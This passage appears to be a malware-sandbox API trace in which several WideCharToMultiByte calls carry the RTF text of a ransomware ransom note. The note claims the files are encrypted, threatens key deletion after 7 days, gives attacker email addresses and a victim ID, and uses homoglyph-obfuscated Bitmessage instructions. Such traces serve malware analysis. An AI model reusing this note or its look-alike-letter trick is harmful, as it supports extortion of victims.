dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2f4 [0297.279] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0297.279] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0297.279] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x23688d8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd 